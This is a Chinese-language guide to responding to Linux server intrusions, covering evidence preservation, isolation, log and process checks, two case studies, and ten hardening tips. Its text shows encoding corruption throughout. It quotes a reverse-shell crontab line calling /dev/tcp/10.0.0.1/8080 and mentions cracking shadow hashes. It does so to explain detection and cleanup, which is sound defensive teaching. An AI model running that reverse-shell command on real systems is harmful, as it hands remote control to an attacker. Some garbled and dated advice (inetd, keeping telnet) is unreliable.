圖 1:處理思路
如上圖�����,將服務(wù)器安全應急響應流程分為如下 8個(gè)環(huán)節:
發(fā)現安全事件(核實(shí))
現場(chǎng)保護
服務(wù)器保護
影響范圍評估
在線(xiàn)分析
數據備份
深入分析
事件報告整理
接下來(lái)我們將每個(gè)環(huán)節分解����,看看需要如何斷開(kāi)異常連接�����、排查入侵源頭���、避免二次入侵等����。
核實(shí)信息(運維/安全人員)
根據安全事件通知源的不同��,分為兩種:
外界通知:和報告人核實(shí)信息��,確認服務(wù)器/系統是否被入侵?����,F在很多企業(yè)有自己的 SRC(安全響應中心)���,在此之前更多的是依賴(lài)某云���。這種情況入侵的核實(shí)一般是安全工程師完成���。
自行發(fā)現:根據服務(wù)器的異?���;蚬收吓袛?����,比如對外發(fā)送大規模流量或者系統負載異常高等���,這種情況一般是運維工程師發(fā)現并核實(shí)的�。
現場(chǎng)保護(運維)
我們很多人看過(guò)大陸的電視劇《重案六組》�����,每次接到刑事案件����,刑警們第一時(shí)間就是封鎖現場(chǎng)����、保存現場(chǎng)原狀�。
同樣道理�����,安全事件發(fā)生現場(chǎng)�����,跟刑事案件發(fā)生現場(chǎng)一樣����,需要保存第一現場(chǎng)重要信息�,方便后面入侵檢測和取證���。
保存現場(chǎng)環(huán)境(截圖)
相關(guān)信息采集命令如下:
進(jìn)程信息:ps axu
網(wǎng)絡(luò )信息:netstat –a
網(wǎng)絡(luò )+進(jìn)程:lsof / netstat -p
攻擊者登陸情況(截圖)
相關(guān)信息采集命令如下:
查看當前登錄用戶(hù):w或 who -a
服務(wù)器保護(運維/機房)
這里的現場(chǎng)保護和服務(wù)器保護是兩個(gè)不同的環(huán)節���,前者注重取證�,后者注重環(huán)境隔離�。
核實(shí)機器被入侵后�,應當盡快將機器保護起來(lái)�,避免被二次入侵或者當成跳板擴大攻擊面���。
此時(shí)�����,為保護服務(wù)器和業(yè)務(wù)�����,避免服務(wù)器被攻擊者繼續利用�����,應盡快遷移業(yè)務(wù)��,立即下線(xiàn)機器�����。
如果不能立即處理�,應當通過(guò)配置網(wǎng)絡(luò ) ACL等方式�,封掉該服務(wù)器對網(wǎng)絡(luò )的雙向連接�。
影響范圍評估(運維/開(kāi)發(fā))
一般是運維或者程序確認影響范圍���,需要運維通過(guò)日志或者監控圖表確認數據庫或者敏感文件是否泄露��,如果是代碼或者數據庫泄露了�,則需要程序評估危害情況與處置方法�。
影響訪(fǎng)問(wèn)評估一般從下面幾點(diǎn)來(lái)入手:
具體業(yè)務(wù)架構:Web(PHP/Java��, WebServer)����, Proxy���, DB等��。
IP及所處區域拓撲等:VLAN內服務(wù)器和應用情況�����。
確定同一網(wǎng)絡(luò )下面服務(wù)器之間的訪(fǎng)問(wèn):可以互相登陸����,是否需要 Key或者是密碼登錄��。
由此確定檢查影響范圍�,確認所有受到影響的網(wǎng)段和機器����。
在線(xiàn)分析(安全人員/運維)
這時(shí)需要根據個(gè)人經(jīng)驗快速在線(xiàn)分析�,一般是安全人員和運維同時(shí)在線(xiàn)處理����,不過(guò)會(huì )涉及多人協(xié)作的問(wèn)題�����,需要避免多人操作機器時(shí)破壞服務(wù)器現場(chǎng)�,造成分析困擾�。
之前筆者遇到一個(gè)類(lèi)似的問(wèn)題��,就是運維排查時(shí)敲錯了 iptables的命令����,將 iptables -L敲成 iptables -i導致 iptables-save時(shí)出現異常記錄��,結果安全人員上來(lái)檢查時(shí)就被這條記錄迷惑了����,導致處理思路受到一定干擾���。
所有用戶(hù) History日志檢測
關(guān)鍵字:wget/curl�, gcc���,或者隱藏文件�����,敏感文件后綴(.c��,.py����,conf�����, .pl�, .sh)��。
檢查是否存在異常用戶(hù)�。
檢查最近添加的用戶(hù)�,是否有不知名用戶(hù)或不規范提權���。
找出 root權限的用戶(hù)�。
可以執行以下命令檢查:
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
反連木馬判斷
netstat –a
注意非正常端口的外網(wǎng) IP
可疑進(jìn)程判斷
判斷是否為木馬 ps –aux
重點(diǎn)關(guān)注文件(隱藏文件)�, Python腳本����,Perl腳本�����,Shell腳本(bash/sh/zsh)���。
使用 which�,whereis��,find定位�����。
Crontab檢測
不要用 crontab –l查看 crontab(繞過(guò)檢測)�,也有通過(guò)寫(xiě) crontab配置文件反彈Shell的��,筆者接觸過(guò)幾次���,一般都是使用的 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1�。
系統日志檢測
檢查 sshd服務(wù)配置文件 /etc/ssh/sshd_config和系統認證日志 auth���、message���,判斷是否為口令破解攻擊���。
/etc/ssh/sshd_config文件確認認證方式����。
確認日志是否被刪除或者清理過(guò)的可能(大小判斷)����。
last/lastb可以作為輔助�,不過(guò)可能不準確��。
NHIDS正常運行判斷
是否安裝:ls /etc/ossec
是否運行正常:ps axu |grep nhids��,三個(gè) nhids進(jìn)程則表示正常
其他攻擊分析
抓取網(wǎng)絡(luò )數據包并進(jìn)行分析���,判斷是否為拒絕服務(wù)攻擊���,這里需要注意�����,一定要使用 -w參數�,這樣才能保存成 pcap格式導入到 wireshark�����,這樣分析起來(lái)會(huì )事半功倍��。
tcpdump -w tcpdump.log
安全相關(guān)的關(guān)鍵文件和數據備份(運維)
可以同步進(jìn)行��,使用 sftp/rsync等將日志上傳到安全的服務(wù)器:
打包系統日志:參考:$ tar -jcvf syslog.tar.bz2 /var/log
打包 Web日志:access log
打包 History日志(所有用戶(hù))���,參考:$ cp /home/user/����,history user_history
打包 crontab記錄
打包密碼文件:/etc/passwd�, /etc/shadow
打包可疑文件���、后門(mén)�、Shell信息
深入分析(安全人員)
初步鎖定異常進(jìn)程和惡意代碼后�����,將受影響范圍梳理清楚�����,封禁了入侵者對機器的控制后���,接下來(lái)需要深入排查入侵原因�����。一般可以從 Webshell���、開(kāi)放端口服務(wù)等方向順藤摸瓜���。
Webshell入侵
使用 Webshell_check.py腳本檢測 Web目錄:
$ python webshell_check.py /var/www/ >result.txt
查找 Web目錄下所有 nobody的文件����,人工分析:
$ find /var/www –user nobody >nobody.txt
如果能確定入侵時(shí)間�,可以使用 find查找最近時(shí)間段內變化的文件:
$ find / -type f -name "\.?*" |xargs ls -l |grep "Mar 22"
$ find / -ctime/-mtime 8
利用 Web漏洞直接反連 Shell
分析 access.log:
縮小日志范圍:時(shí)間���,異常 IP提取�����。
攻擊行為提?��。撼R?jiàn)的攻擊 exp識別����。
系統弱口令入侵
認證相關(guān)日志 auth/syslog/message排查:
爆破行為定位和 IP提取�����。
爆破是否成功確定:有爆破行為 IP是否有 accept記錄�����。
如果日志已經(jīng)被清理��,使用工具(比如John the Ripper)爆破 /etc/passwd���,/etc/shadow�����。
其他入侵
其他服務(wù)器跳板到本機���。
后續行為分析
History日志:提權��、增加后門(mén)����,以及是否被清理��。
Sniffer:網(wǎng)卡混雜模式檢測 ifconfig |grep –i proc���。
內網(wǎng)掃描:網(wǎng)絡(luò ) nmap/掃描器����,socks5代理�����。
確定是否有 rootkit:rkhunter�����, chkrootkit�, ps/netstat替換確認���。
后門(mén)清理排查
根據時(shí)間點(diǎn)做關(guān)聯(lián)分析:查找那個(gè)時(shí)間段的所有文件�。
一些小技巧:/tmp目錄���, ls –la�,查看所有文件�,注意隱藏的文件����。
根據用戶(hù)做時(shí)間關(guān)聯(lián):比如 nobody�����。
其他機器的關(guān)聯(lián)操作
其他機器和這臺機器的網(wǎng)絡(luò )連接 (日志查看)����、相同業(yè)務(wù)情況(同樣業(yè)務(wù)�,負載均衡)���。
整理事件報告(安全人員)
事件報告應包含但不限于以下幾個(gè)點(diǎn):
分析事件發(fā)生原因:事件為什么會(huì )發(fā)生的原因���。
分析整個(gè)攻擊流程:時(shí)間點(diǎn)���、操作���。
分析事件處理過(guò)程:整個(gè)事件處理過(guò)程總結是否有不足����。
分析事件預防:如何避免事情再次發(fā)生����。
總結:總結事件原因��,改進(jìn)處理過(guò)程�����,預防類(lèi)似事件再次發(fā)生����。
處理中遇到的比較棘手的事情
1��、日志和操作記錄全被刪了�����,怎么辦����?
strace查看 losf進(jìn)程��,再?lài)L試恢復一下日志記錄����,不行的話(huà)鏡像硬盤(pán)數據慢慢查�。這個(gè)要用到一些取證工具了�����,dd 硬盤(pán)數據再去還原出來(lái)����。
2���、系統賬號密碼都修改了���,登不進(jìn)去���?
重啟進(jìn)單用戶(hù)模式修改 root密碼�,或者通過(guò)控制卡操作�����,或者直接還原系統����,都搞不定就直接重裝吧����。
3��、使用常見(jiàn)的入侵檢測命令未發(fā)現異常進(jìn)程�����,但是機器在對外發(fā)包��,這是怎么回事����?
這種情況下很可能常用的系統命令已經(jīng)被攻擊者或者木馬程序替換��,可以通過(guò) md5sum對比本機二進(jìn)制文件與正常機器的 md5值是否一致��。
如果發(fā)現不一致��,肯定是被替換了�����,可以從其他機器上拷貝命令到本機替換����,或者 alias為其他名稱(chēng)�����,避免為惡意程序再次替換�����。
4����、被 getshell怎么辦�����?
漏洞修復前�,系統立即下線(xiàn)�,用內網(wǎng)環(huán)境訪(fǎng)問(wèn)����。
上傳點(diǎn)放到內網(wǎng)訪(fǎng)問(wèn)�����,不允許外網(wǎng)有類(lèi)似的上傳點(diǎn)�,有上傳點(diǎn)����,而且沒(méi)有校驗文件類(lèi)型很容易上傳 Webshell�。
被 getshell的服務(wù)器中是否有敏感文件和數據庫����,如果有請檢查是否有泄漏���。
hosts文件中對應的 host關(guān)系需要重新配置��,攻擊者可以配置 hosts來(lái)訪(fǎng)問(wèn)測試環(huán)境��。
重裝系統�����。
案例分析
上面講了很多思路的東西���,相信大家更想看看實(shí)際案例���,下面介紹兩個(gè)案例���。
案例 1
一個(gè)別人處理的案例��,基本處理過(guò)程如下:
通過(guò)外部端口掃描收集開(kāi)放端口信息�����,然后獲取到反彈 Shell信息��,登陸機器發(fā)現關(guān)鍵命令已經(jīng)被替換��,后面查看 History記錄����,發(fā)現疑似木馬文件�,通過(guò)簡(jiǎn)單逆向和進(jìn)程查看發(fā)現了異常進(jìn)程�����,從而鎖定了入侵原因��。
案例 2
一個(gè)筆者實(shí)際處理過(guò)的案例��,基本處理流程跟上面提到的思路大同小異���。
整個(gè)事情處理經(jīng)過(guò)大致如下:
1���、運維發(fā)現一臺私有云主機間歇性的對外發(fā)送高達 800Mbps的流量��,影響了同一個(gè)網(wǎng)段的其他機器���。
2��、安全人員接到通知后����,先確認了機器屬于備機�����,沒(méi)有跑在線(xiàn)業(yè)務(wù)��,于是通知運維封禁 iptables限制外網(wǎng)訪(fǎng)問(wèn)���。
3�����、運維為安全人員臨時(shí)開(kāi)通機器權限�����,安全人員通過(guò) History和 ps找到的入侵記錄和異常進(jìn)程鎖定了對外大量發(fā)包的應用程序�,清理了惡意進(jìn)程并刪除惡意程序���。
惡意進(jìn)程如下����,經(jīng)過(guò)在網(wǎng)絡(luò )搜索發(fā)現是一種 DDOS木馬����,但沒(méi)有明確的處理思路:
/usr/bin/bsd-port/getty/usr/bin/acpid./dbuspm-session /sbin/DDosClient RunByP4407/sbin/DDosClient RunByPM4673
處理過(guò)程中�����,安全人員懷疑系統文件被替換��,通過(guò)對比該機器與正常機器上面的 ps�����、netstat等程序的大小發(fā)現敏感程序已經(jīng)被替換�����,而且 mtime也被修改�。
正常機器:
du -sh /bin/ps
92K /bin/ps
du -sh /bin/netstat
120K /bin/netstat
被入侵機器:
du -sh /bin/netstat
2.0M /bin/netstat
du -sh /bin/ps
2.0M /bin/ps
將部分常用二進(jìn)制文件修復后���,發(fā)現異常進(jìn)程被 kill掉后仍重啟了�����,于是安裝殺毒軟件 clamav和 rootkit hunter進(jìn)行全盤(pán)掃描�����。
從而確認了被感染的所有文件��,將那些可以刪除的文件刪除后再次 kill掉異常進(jìn)程��,則再沒(méi)有重啟的問(wèn)題�。
4�����、影響范圍評估
由于該機器只是備機�����,上面沒(méi)有敏感數據�����,于是信息泄露問(wèn)題也就不存在了�����。
掃描同一網(wǎng)段機器端口開(kāi)放情況��、排查被入侵機器 History是否有對外掃描或者入侵行為�����,為此還在該網(wǎng)段機器另外部署蜜罐進(jìn)行監控�����。
5����、深入分析入侵原因
通過(guò)被入侵機器所跑服務(wù)���、iptables狀態(tài)�,確認是所跑服務(wù)支持遠程命令執行�。
并且機器 iptables為空導致黑客通過(guò)往 /etc/crontab中寫(xiě)“bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”命令方式進(jìn)行 Shell反彈�����,從而入侵了機器���。
6�����、驗證修復���、機器下線(xiàn)重裝
進(jìn)行以上修復操作后���,監控未發(fā)現再有異常�,于是將機器下線(xiàn)重裝��。
7����、完成安全事件處理報告
每次安全事件處理后����,都應當整理成報告����,不管是知識庫的構建�����,還是統計分析安全態(tài)勢����,都是很有必要的����。
這次主要介紹了服務(wù)器被入侵時(shí)推薦的一套處理思路�����。實(shí)際上�����,安全防護跟運維思路一樣���,都是要防患于未然�,這時(shí)候的審計或者響應很難避免危害的發(fā)生了�。
我們更希望通過(guò)安全意識教育�、安全制度的建設����,在問(wèn)題顯露端倪時(shí)即可消弭于無(wú)形���。
Linux服務(wù)器安全防護要點(diǎn)
1����、強化:密碼管理
設定登錄密碼是一項非常重要的安全措施�,如果用戶(hù)的密碼設定不合適���,就很容易被破譯�,尤其是擁有超級用戶(hù)使用權限的用戶(hù)���,如果沒(méi)有良好的密碼�,將給系統造成很大的安全漏洞�。
目前密碼破解程序大多采用字典攻擊以及暴力攻擊手段���,而其中用戶(hù)密碼設定不當�����,則極易受到字典攻擊的威脅���。很多用戶(hù)喜歡用自己的英文名����、生日或者賬戶(hù)等信息來(lái)設定密碼��,這樣����,黑客可能通過(guò)字典攻擊或者是社會(huì )工程的手段來(lái)破解密碼�����。所以建議用戶(hù)在設定密碼的過(guò)程中���,應盡量使用非字典中出現的組合字符����,并且采用數字與字符相結合�����、大小寫(xiě)相結合的密碼設置方式���,增加密碼被黑客破解的難度����。而且�����,也可以使用定期修改密碼����、使密碼定期作廢的方式�,來(lái)保護自己的登錄密碼��。
在多用戶(hù)系統中�����,如果強迫每個(gè)用戶(hù)選擇不易猜出的密碼���,將大大提高系統的安全性���。但如果passwd程序無(wú)法強迫每個(gè)上機用戶(hù)使用恰當的密碼�����,要確保密碼的安全度�����,就只能依靠密碼破解程序了����。實(shí)際上��,密碼破解程序是黑客工具箱中的一種工具�,它將常用的密碼或者是英文字典中所有可能用來(lái)作密碼的字都用程序加密成密碼字��,然后將其與Linux系統的/etc/passwd密碼文件或/etc/shadow影子文件相比較��,如果發(fā)現有吻合的密碼��,就可以求得明碼了�����。在網(wǎng)絡(luò )上可以找到很多密碼破解程序�,比較有名的程序是crack和john the ripper.用戶(hù)可以自己先執行密碼破解程序�,找出容易被黑客破解的密碼��,先行改正總比被黑客破解要有利�����。
2�、限定:網(wǎng)絡(luò )服務(wù)管理
早期的Linux版本中���,每一個(gè)不同的網(wǎng)絡(luò )服務(wù)都有一個(gè)服務(wù)程序(守護進(jìn)程���,Daemon)在后臺運行�,后來(lái)的版本用統一的/etc/inetd服務(wù)器程序擔此重任�����。Inetd是Internetdaemon的縮寫(xiě)��,它同時(shí)監視多個(gè)網(wǎng)絡(luò )端口����,一旦接收到外界傳來(lái)的連接信息���,就執行相應的TCP或UDP網(wǎng)絡(luò )服務(wù)����。由于受inetd的統一指揮��,因此Linux中的大部分TCP或UDP服務(wù)都是在/etc/inetd.conf文件中設定��。所以取消不必要服務(wù)的第一步就是檢查/etc/inetd.conf文件����,在不要的服務(wù)前加上“#”號�����。
一般來(lái)說(shuō)����,除了http����、smtp�、telnet和ftp之外�����,其他服務(wù)都應該取消����,諸如簡(jiǎn)單文件傳輸協(xié)議tftp�、網(wǎng)絡(luò )郵件存儲及接收所用的imap/ipop傳輸協(xié)議�����、尋找和搜索資料用的gopher以及用于時(shí)間同步的daytime和time等����。還有一些報告系統狀態(tài)的服務(wù)�,如finger���、efinger����、systat和netstat等����,雖然對系統查錯和尋找用戶(hù)非常有用���,但也給黑客提供了方便之門(mén)���。例如���,黑客可以利用finger服務(wù)查找用戶(hù)的電話(huà)��、使用目錄以及其他重要信息�����。因此�,很多Linux系統將這些服務(wù)全部取消或部分取消����,以增強系統的安全性���。Inetd除了利用/etc/inetd.conf設置系統服務(wù)項之外�����,還利用/etc/services文件查找各項服務(wù)所使用的端口�。因此���,用戶(hù)必須仔細檢查該文件中各端口的設定����,以免有安全上的漏洞��。
在后繼的Linux版本中(比如Red Hat Linux7.2之后)�,取而代之的是采用xinetd進(jìn)行網(wǎng)絡(luò )服務(wù)的管理�����。
當然��,具體取消哪些服務(wù)不能一概而論��,需要根據實(shí)際的應用情況來(lái)定�,但是系統管理員需要做到心中有數����,因為一旦系統出現安全問(wèn)題����,才能做到有步驟���、有條不紊地進(jìn)行查漏和補救工作���,這點(diǎn)比較重要�。
3����、嚴格審計:系統登錄用戶(hù)管理
在進(jìn)入Linux系統之前����,所有用戶(hù)都需要登錄��,也就是說(shuō)�����,用戶(hù)需要輸入用戶(hù)賬號和密碼�����,只有它們通過(guò)系統驗證之后���,用戶(hù)才能進(jìn)入系統��。
與其他Unix操作系統一樣���,Linux一般將密碼加密之后���,存放在/etc/passwd文件中�。Linux系統上的所有用戶(hù)都可以讀到/etc/passwd文件�����,雖然文件中保存的密碼已經(jīng)經(jīng)過(guò)加密��,但仍然不太安全�����。因為一般的用戶(hù)可以利用現成的密碼破譯工具����,以窮舉法猜測出密碼��。比較安全的方法是設定影子文件/etc/shadow���,只允許有特殊權限的用戶(hù)閱讀該文件�����。
在Linux系統中���,如果要采用影子文件����,必須將所有的公用程序重新編譯����,才能支持影子文件�。這種方法比較麻煩�����,比較簡(jiǎn)便的方法是采用插入式驗證模塊(PAM)�。很多Linux系統都帶有Linux的工具程序PAM��,它是一種身份驗證機制��,可以用來(lái)動(dòng)態(tài)地改變身份驗證的方法和要求�����,而不要求重新編譯其他公用程序�����。這是因為PAM采用封閉包的方式�����,將所有與身份驗證有關(guān)的邏輯全部隱藏在模塊內����,因此它是采用影子檔案的最佳幫手���。
此外��,PAM還有很多安全功能:它可以將傳統的DES加密方法改寫(xiě)為其他功能更強的加密方法����,以確保用戶(hù)密碼不會(huì )輕易地遭人破譯;它可以設定每個(gè)用戶(hù)使用電腦資源的上限;它甚至可以設定用戶(hù)的上機時(shí)間和地點(diǎn)����。
Linux系統管理人員只需花費幾小時(shí)去安裝和設定PAM��,就能大大提高Linux系統的安全性�����,把很多攻擊阻擋在系統之外���。
4�����、設定:用戶(hù)賬號安全等級管理
除密碼之外��,用戶(hù)賬號也有安全等級����,這是因為在Linux上每個(gè)賬號可以被賦予不同的權限�����,因此在建立一個(gè)新用戶(hù)ID時(shí)����,系統管理員應該根據需要賦予該賬號不同的權限�����,并且歸并到不同的用戶(hù)組中�����。
在Linux系統中的部分文件中�,可以設定允許上機和不允許上機人員的名單��。其中��,允許上機人員名單在/etc/hosts.allow中設置���,不允許上機人員名單在/etc/hosts.deny中設置�����。此外���,Linux將自動(dòng)把允許進(jìn)入或不允許進(jìn)入的結果記錄到/var/log/secure文件中�,系統管理員可以據此查出可疑的進(jìn)入記錄��。
每個(gè)賬號ID應該有專(zhuān)人負責�����。在企業(yè)中�����,如果負責某個(gè)ID的職員離職��,管理員應立即從系統中刪除該賬號���。很多入侵事件都是借用了那些很久不用的賬號�。
在用戶(hù)賬號之中�����,黑客最喜歡具有root權限的賬號����,這種超級用戶(hù)有權修改或刪除各種系統設置���,可以在系統中暢行無(wú)阻���。因此�����,在給任何賬號賦予root權限之前�����,都必須仔細考慮����。
Linux系統中的/etc/securetty文件包含了一組能夠以root賬號登錄的終端機名稱(chēng)��。例如�����,在RedHatLinux系統中����,該文件的初始值僅允許本地虛擬控制臺(rtys)以root權限登錄���,而不允許遠程用戶(hù)以root權限登錄����。最好不要修改該文件�����,如果一定要從遠程登錄為root權限���,最好是先以普通賬號登錄�����,然后利用su命令升級為超級用戶(hù)�����。
5�����、謹慎使用:“r系列”遠程程序管理
在Linux系統中有一系列r字頭的公用程序�,比如rlogin���,rcp等等����。它們非常容易被黑客用來(lái)入侵我們的系統�����,因而非常危險����,因此絕對不要將root賬號開(kāi)放給這些公用程序���。由于這些公用程序都是用���。rhosts文件或者hosts.equiv文件核準進(jìn)入的����,因此一定要確保root賬號不包括在這些文件之內���。
由于r等遠程指令是黑客們用來(lái)攻擊系統的較好途徑����,因此很多安全工具都是針對這一安全漏洞而設計的�。例如��,PAM工具就可以用來(lái)將r字頭公用程序有效地禁止掉���,它在/etc/pam.d/rlogin文件中加上登錄必須先核準的指令���,使整個(gè)系統的用戶(hù)都不能使用自己home目錄下的����。rhosts文件����。
6�、限制:root用戶(hù)權限管理
Root一直是Linux保護的重點(diǎn)�����,由于它權力無(wú)限�,因此最好不要輕易將超級用戶(hù)授權出去���。但是�,有些程序的安裝和維護工作必須要求有超級用戶(hù)的權限��,在這種情況下����,可以利用其他工具讓這類(lèi)用戶(hù)有部分超級用戶(hù)的權限�����。sudo就是這樣的工具�。
sudo程序允許一般用戶(hù)經(jīng)過(guò)組態(tài)設定后�,以用戶(hù)自己的密碼再登錄一次�����,取得超級用戶(hù)的權限�����,但只能執行有限的幾個(gè)指令����。例如��,應用sudo后�,可以讓管理磁帶備份的管理人員每天按時(shí)登錄到系統中���,取得超級用戶(hù)權限去執行文檔備份工作��,但卻沒(méi)有特權去作其他只有超級用戶(hù)才能作的工作�����。
sudo不但限制了用戶(hù)的權限�����,而且還將每次使用sudo所執行的指令記錄下來(lái)�,不管該指令的執行是成功還是失敗���。在大型企業(yè)中�,有時(shí)候有許多人同時(shí)管理Linux系統的各個(gè)不同部分���,每個(gè)管理人員都有用sudo授權給某些用戶(hù)超級用戶(hù)權限的能力��,從sudo的日志中����,可以追蹤到誰(shuí)做了什么以及改動(dòng)了系統的哪些部分�。
值得注意的是����,sudo并不能限制所有的用戶(hù)行為�,尤其是當某些簡(jiǎn)單的指令沒(méi)有設置限定時(shí)��,就有可能被黑客濫用����。例如���,一般用來(lái)顯示文件內容的/etc/cat指令���,如果有了超級用戶(hù)的權限����,黑客就可以用它修改或刪除一些重要的文件���。
7����、追蹤黑客蹤跡:日志管理
當用戶(hù)仔細設定了各種與Linux相關(guān)的配置(最常用日志管理選項)�,并且安裝了必要的安全防護工具之后��,Linux操作系統的安全性的確大為提高���,但是卻并不能保證防止那些比較熟練的網(wǎng)絡(luò )黑客的入侵����。
在平時(shí)��,網(wǎng)絡(luò )管理人員要經(jīng)常提高警惕����,隨時(shí)注意各種可疑狀況�,并且按時(shí)檢查各種系統日志文件�����,包括一般信息日志����、網(wǎng)絡(luò )連接日志�����、文件傳輸日志以及用戶(hù)登錄日志等�����。在檢查這些日志時(shí)����,要注意是否有不合常理的時(shí)間記載�。例如:
正常用戶(hù)在半夜三更登錄����;
不正常的日志記錄�����,比如日志只記錄了一半就切斷了�����,或者整個(gè)日志文件被刪除了���;
用戶(hù)從陌生的網(wǎng)址進(jìn)入系統��;
因密碼錯誤或用戶(hù)賬號錯誤被擯棄在外的日志記錄����,尤其是那些一再連續嘗試進(jìn)入失敗�,但卻有一定模式的試錯法���;
非法使用或不正當使用超級用戶(hù)權限su的指令�����;
重新開(kāi)機或重新啟動(dòng)各項服務(wù)的記錄�����。
上述這些問(wèn)題都需要系統管理員隨時(shí)留意系統登錄的用戶(hù)狀況以及查看相應日志文件����,許多背離正常行為的蛛絲馬跡都應當引起高度注意��。
8��、橫向擴展:綜合防御管理
防火墻�、IDS等防護技術(shù)已經(jīng)成功地應用到網(wǎng)絡(luò )安全的各個(gè)領(lǐng)域�����,而且都有非常成熟的產(chǎn)品���。
在Linux系統來(lái)說(shuō)��,有一個(gè)自帶的Netfilter/Iptables防火墻框架��,通過(guò)合理地配置其也能起到主機防火墻的功效���。在Linux系統中也有相應的輕量級的網(wǎng)絡(luò )入侵檢測系統Snort以及主機入侵檢測系統LIDS(Linux Intrusion Detection System)���,使用它們可以快速�、高效地進(jìn)行防護����。
需要提醒注意的是:在大多數的應用情境下�����,我們需要綜合使用這兩項技術(shù)��,因為防火墻相當于安全防護的第一層���,它僅僅通過(guò)簡(jiǎn)單地比較IP地址/端口對來(lái)過(guò)濾網(wǎng)絡(luò )流量��,而IDS更加具體��,它需要通過(guò)具體的數據包(部分或者全部)來(lái)過(guò)濾網(wǎng)絡(luò )流量����,是安全防護的第二層�����。綜合使用它們��,能夠做到互補����,并且發(fā)揮各自的優(yōu)勢���,最終實(shí)現綜合防御���。
9�、評測:漏洞追蹤及管理
Linux作為一種優(yōu)秀的開(kāi)源軟件�,其自身的發(fā)展也日新月異�����,同時(shí)��,其存在的問(wèn)題也會(huì )在日后的應用中慢慢暴露出來(lái)�����。黑客對新技術(shù)的關(guān)注從一定程度上來(lái)說(shuō)要高于我們防護人員�����,所以要想在網(wǎng)絡(luò )攻防的戰爭中處于有利地位���,保護Linux系統的安全��,就要求我們要保持高度的警惕性和對新技術(shù)的高度關(guān)注���。用戶(hù)特別是使用Linux作為關(guān)鍵業(yè)務(wù)系統的系統管理員們���,需要通過(guò)Linux的一些權威網(wǎng)站和論壇上盡快地獲取有關(guān)該系統的一些新技術(shù)以及一些新的系統漏洞的信息���,進(jìn)行漏洞掃描���、滲透測試等系統化的相關(guān)配套工作��,做到防范于未然����,提早行動(dòng)��,在漏洞出現后甚至是出現前的最短時(shí)間內封堵系統的漏洞��,并且在實(shí)踐中不斷地提高安全防護的技能�����,這樣才是一個(gè)比較的解決辦法和出路��。
10���、保持更新:補丁管理
Linux作為一種優(yōu)秀的開(kāi)源軟件���,其穩定性�、安全性和可用性有極為可靠的保證��,世界上的Linux高手共同維護著(zhù)個(gè)優(yōu)秀的產(chǎn)品���,因而起流通渠道很多��,而且經(jīng)常有更新的程序和系統補丁出現���,因此��,為了加強系統安全���,一定要經(jīng)常更新系統內核����。
Kernel是Linux操作系統的核心��,它常駐內存���,用于加載操作系統的其他部分��,并實(shí)現操作系統的基本功能�。由于Kernel控制計算機和網(wǎng)絡(luò )的各種功能���,因此�����,它的安全性對整個(gè)系統安全至關(guān)重要����。早期的Kernel版本存在許多眾所周知的安全漏洞��,而且也不太穩定�����,只有2.0.x以上的版本才比較穩定和安全(一般說(shuō)來(lái)�,內核版本號為偶數的相對穩定���,而為奇數的則一般為測試版本��,用戶(hù)們使用時(shí)要多留意)�����,新版本的運行效率也有很大改觀(guān)��。在設定Kernel的功能時(shí)����,只選擇必要的功能�,千萬(wàn)不要所有功能照單全收����,否則會(huì )使Kernel變得很大�����,既占用系統資源��,也給黑客留下可乘之機���。
在Internet上常常有最新的安全修補程序��,Linux系統管理員應該消息靈通�,經(jīng)常光顧安全新聞組�,查閱新的修補程序����。
